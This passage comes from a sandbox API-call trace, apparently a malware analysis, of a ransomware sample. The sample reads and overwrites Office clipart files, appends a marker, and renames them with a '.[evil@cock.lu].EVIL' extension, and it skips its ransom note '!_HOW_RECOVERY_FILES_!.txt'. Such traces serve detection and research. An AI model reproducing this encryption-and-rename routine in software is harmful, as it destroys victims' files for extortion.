hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0159.076] wcsstr (_Str="NA01069_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0159.077] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01069_.WMF") returned 69 [0159.077] wcscmp (_String1="NA01069_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0159.077] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01069_.WMF") returned 0x0 [0159.077] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01069_.WMF") returned 0x45 [0159.077] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01069_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01069_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.079] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1a7e, lpOverlapped=0x0) returned 1 [0159.086] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.086] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.086] _errno () returned 0x84b1160840 [0159.086] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.086] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x1a80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1a80, lpOverlapped=0x0) returned 1 [0159.086] CloseHandle (hObject=0x1a8) returned 1 [0159.087] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01069_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0159.087] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0159.087] __uncaught_exception () returned 0x84b1160800 [0159.087] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0159.087] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01069_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01069_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01069_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01069_.wmf.[evil@cock.lu].evil")) returned 1 [0159.088] ??_V@YAXPEAX@Z () returned 0x1 [0159.093] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01069_.WMF", dwFileAttributes=0x200) returned 0 [0159.093] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0159.093] wcsstr (_Str="NA01123_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0159.093] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01123_.WMF") returned 69 [0159.093] wcscmp (_String1="NA01123_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0159.093] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01123_.WMF") returned 0x0 [0159.093] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01123_.WMF") returned 0x45 [0159.094] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01123_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01123_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.095] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1e00, lpOverlapped=0x0) returned 1 [0159.108] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.108] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.108] _errno () returned 0x84b1160840 [0159.108] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.108] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x1e20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1e20, lpOverlapped=0x0) returned 1 [0159.109] CloseHandle (hObject=0x1a8) returned 1 [0159.109] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01123_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0159.109] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0159.109] __uncaught_exception () returned 0x84b1160800 [0159.109] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0159.109] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01123_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01123_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01123_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01123_.wmf.[evil@cock.lu].evil")) returned 1 [0159.110] ??_V@YAXPEAX@Z () returned 0x1 [0159.113] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01123_.WMF", dwFileAttributes=0x200) returned 0 [0159.113] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0159.113] wcsstr (_Str="NA01126_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0159.113] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01126_.WMF") returned 69 [0159.113] wcscmp (_String1="NA01126_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0159.113] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01126_.WMF") returned 0x0 [0159.113] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01126_.WMF") returned 0x45 [0159.113] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01126_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01126_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.115] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb70, lpOverlapped=0x0) returned 1 [0159.122] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.122] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.122] _errno () returned 0x84b1160840 [0159.122] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.122] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0xb80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb80, lpOverlapped=0x0) returned 1 [0159.122] CloseHandle (hObject=0x1a8) returned 1 [0159.122] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01126_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0159.123] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0159.123] __uncaught_exception () returned 0x84b1160800 [0159.123] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0159.123] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01126_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01126_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01126_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01126_.wmf.[evil@cock.lu].evil")) returned 1 [0159.124] ??_V@YAXPEAX@Z () returned 0x1 [0159.126] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01126_.WMF", dwFileAttributes=0x200) returned 0 [0159.127] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0159.127] wcsstr (_Str="NA01130_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0159.127] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01130_.WMF") returned 69 [0159.127] wcscmp (_String1="NA01130_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0159.127] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01130_.WMF") returned 0x0 [0159.127] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01130_.WMF") returned 0x45 [0159.127] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01130_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01130_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.129] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x16a0, lpOverlapped=0x0) returned 1 [0159.136] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.136] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.136] _errno () returned 0x84b1160840 [0159.136] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.136] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x16c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x16c0, lpOverlapped=0x0) returned 1 [0159.136] CloseHandle (hObject=0x1a8) returned 1 [0159.136] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01130_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0159.136] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0159.137] __uncaught_exception () returned 0x84b1160800 [0159.137] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0159.137] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01130_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01130_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01130_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01130_.wmf.[evil@cock.lu].evil")) returned 1 [0159.138] ??_V@YAXPEAX@Z () returned 0x1 [0159.142] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01130_.WMF", dwFileAttributes=0x200) returned 0 [0159.142] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0159.142] wcsstr (_Str="NA01141_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0159.142] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01141_.WMF") returned 69 [0159.142] wcscmp (_String1="NA01141_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0159.142] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01141_.WMF") returned 0x0 [0159.142] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01141_.WMF") returned 0x45 [0159.142] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01141_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.144] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x16d8, lpOverlapped=0x0) returned 1 [0159.153] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.153] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.153] _errno () returned 0x84b1160840 [0159.153] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.153] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x16e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x16e0, lpOverlapped=0x0) returned 1 [0159.153] CloseHandle (hObject=0x1a8) returned 1 [0159.153] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01141_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0159.154] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0159.154] __uncaught_exception () returned 0x84b1160800 [0159.154] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0159.154] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01141_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01141_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01141_.wmf.[evil@cock.lu].evil")) returned 1 [0159.155] ??_V@YAXPEAX@Z () returned 0x1 [0159.158] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01141_.WMF", dwFileAttributes=0x200) returned 0 [0159.158] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0159.158] wcsstr (_Str="NA01148_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0159.158] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01148_.WMF") returned 69 [0159.158] wcscmp (_String1="NA01148_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0159.158] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01148_.WMF") returned 0x0 [0159.158] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01148_.WMF") returned 0x45 [0159.158] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01148_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01148_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.161] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1f38, lpOverlapped=0x0) returned 1 [0159.169] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.169] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.169] _errno () returned 0x84b1160840 [0159.169] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.170] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x1f40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1f40, lpOverlapped=0x0) returned 1 [0159.174] CloseHandle (hObject=0x1a8) returned 1 [0159.174] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01148_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0159.174] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0159.174] __uncaught_exception () returned 0x84b1160800 [0159.174] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0159.175] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01148_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01148_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01148_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01148_.wmf.[evil@cock.lu].evil")) returned 1 [0159.176] ??_V@YAXPEAX@Z () returned 0x1 [0159.179] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01148_.WMF", dwFileAttributes=0x200) returned 0 [0159.179] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0159.179] wcsstr (_Str="NA01149_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0159.179] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01149_.WMF") returned 69 [0159.179] wcscmp (_String1="NA01149_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0159.179] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01149_.WMF") returned 0x0 [0159.179] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01149_.WMF") returned 0x45 [0159.179] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01149_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01149_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.181] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1248, lpOverlapped=0x0) returned 1 [0159.188] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.188] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.188] _errno () returned 0x84b1160840 [0159.188] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.188] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x1260, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1260, lpOverlapped=0x0) returned 1 [0159.188] CloseHandle (hObject=0x1a8) returned 1 [0159.188] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01149_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0159.188] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0159.188] __uncaught_exception () returned 0x84b1160800 [0159.188] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0159.189] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01149_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01149_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01149_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01149_.wmf.[evil@cock.lu].evil")) returned 1 [0159.189] ??_V@YAXPEAX@Z () returned 0x1 [0159.192] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01149_.WMF", dwFileAttributes=0x200) returned 0 [0159.192] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0159.192] wcsstr (_Str="NA01152_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0159.192] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01152_.WMF") returned 69 [0159.192] wcscmp (_String1="NA01152_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0159.192] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01152_.WMF") returned 0x0 [0159.192] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01152_.WMF") returned 0x45 [0159.192] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01152_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.194] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2230, lpOverlapped=0x0) returned 1 [0159.202] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.202] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.202] _errno () returned 0x84b1160840 [0159.202] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.202] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x2240, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2240, lpOverlapped=0x0) returned 1 [0159.202] CloseHandle (hObject=0x1a8) returned 1 [0159.202] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01152_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0159.202] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0159.202] __uncaught_exception () returned 0x84b1160800 [0159.202] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0159.203] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01152_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01152_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01152_.wmf.[evil@cock.lu].evil")) returned 1 [0159.203] ??_V@YAXPEAX@Z () returned 0x1 [0159.206] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01152_.WMF", dwFileAttributes=0x200) returned 0 [0159.206] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0159.206] wcsstr (_Str="NA01154_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0159.206] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01154_.WMF") returned 69 [0159.206] wcscmp (_String1="NA01154_.WMF", 